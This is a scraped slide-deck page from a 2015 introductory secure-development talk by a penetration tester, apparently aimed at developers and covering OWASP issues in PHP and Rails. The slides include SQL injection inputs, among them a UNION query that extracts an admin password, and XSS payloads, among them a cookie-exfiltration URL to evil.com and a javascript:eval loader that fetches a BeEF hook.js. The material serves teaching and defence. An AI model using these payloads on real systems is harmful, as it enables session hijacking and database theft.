Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
Salesforce Integration for Bonterra Impact Management (fka Social Solutions A...
 
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdfNunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
Nunit vs XUnit vs MSTest Differences Between These Unit Testing Frameworks.pdf
 

Don't Do what Derpy the Dreadful Dev Does

  • 1. Don’t Do what Derpy The Dreadful Dev Does (also - don’t let “friends” on IRC decide on your talk title) Secure Development Melbourne, 11/06/2015
  • 2. whoami • @liamosaur • Penetration Tester / Consultant with Assurance • Previously: C# / Java developer
  • 3. The Brief • Basic, Introductory Level talk about security • Establish some common ground between the Infosec and Dev world
  • 4. Topics • Popular vulnerabilities (hopefully a recap) • Demo some tools by exploiting some vulns
  • 5. OWASP Top 5/10 1. Injection (SQLi, Command injection, XXE, LDAPi etc) 2. Broken Auth / Session Management 3. Cross-Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration
  • 6. SQLi basics • Inject user controlled content into dynamic SQL queries, allowing unintended access/ control of database
  • 7. SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo • SQL: SELECT username FROM users WHERE username=‘liamo’ • Query result: liamo
  • 8. SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: ' OR 'a'='a • SQL: SELECT username FROM users WHERE username=‘' OR ‘a'='a’ • Query result: list of all users
  • 9. SQLi basics • PHP: $query = "SELECT username FROM users WHERE username=‘". $_POST['username']."'"; • Input: liamo' UNION SELECT password FROM users WHERE username='admin • SQL: SELECT username FROM users WHERE username=‘liamo' UNION SELECT password FROM users WHERE username='admin’ • Query result: liamo and the admin password
  • 10. Cross-Site Scripting (XSS) • Inject user controlled content into dynamic web content, allowing unintended access/ control within a target browser
  • 11. XSS Basics • HTML: <html><body>Hello, <?php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam • Output: Hello, Liam!
  • 12. XSS Basics • HTML: <html><body>Hello, <? php echo $_REQUEST ['name']; ?>!</body></ html> • Input: Liam<script>alert(1)</ script> • Output:
  • 13. XSS - Who cares? • Old school - cookie stealing • http://evil.com/cookies.php? +escape(document.cookie) • Steal session ID - game over • Less effective thanks to httpOnly cookie flag
  • 14. “Nobody uses PHP anymore Liam, all the cool kids use Ruby on Rails now” PHP Demo!
  • 15. Rails • Problem #1 - I don’t know Rails • Solution: Learn Rails! (this is definitely a worthwhile proposition for a “10-20 minute talk”)
  • 16. Rails • Learned Rails. Wrote a basic app • Problem #2: Rails has ActiveRecord magic beans that prevent SQLi
  • 17. Rails • Solution: Uhh.. maybe I’ll just demo XSS instead!
  • 18. Rails • Problem #3: Rails has input/ output escaping magic beans that prevent XSS
  • 19. • Solution: Declare webapp security solved, retire from pentesting, write Rails app, move to SF, get VC, found startup, sell to Google/Apple, make fat stacks, retire
  • 22. Presenting: Rubby • Bad code • Better code
  • 24. Rubby XSS • “link_to” is vulnerable to XSS out of the box if it displays user controlled content
  • 25. Rubby XSS • Challenge for those playing at home: some up with a shorter, more elegant way of injecting a link to hook.js into a Rails link_to than this monstrosity: javascript:eval("function x() {var a = document.createElement('scrip t');a.setAttribute('src','htt p://192.168.57.159:3000/ hook.js');document.head.appen dChild(a);};x();");
  • 26. BeEF Tunnelling Proxy BeEF SERVER 
 (http proxy) Phish with XSS hook.js Attackers Browser Victims Browser
 (XHR proxy) Target server (same domain as XSS phish)
  • 27. Frameworks/Languages • PHP • Bad: No built in security • Ruby on Rails • Good: Built in security
  • 28. Frameworks/Languages • PHP • Good: PHP devs know they need to take security into account • Ruby on Rails • Bad: “The framework takes care of security for me!”
  • 29. Conclusions • Security is everyone’s responsibility • Your frameworks magic beans won’t save you
  • 30. Questions - save for the Q&A Panel!
  • 31. References • https://www.owasp.org/index.php/ Top_10_2013-Top_10 • http://rails-sqli.org/ • https://www.owasp.org/index.php/ Ruby_on_Rails_Cheatsheet • https://github.com/beefproject/beef/wiki/ Tunneling • http://sqlmap.org/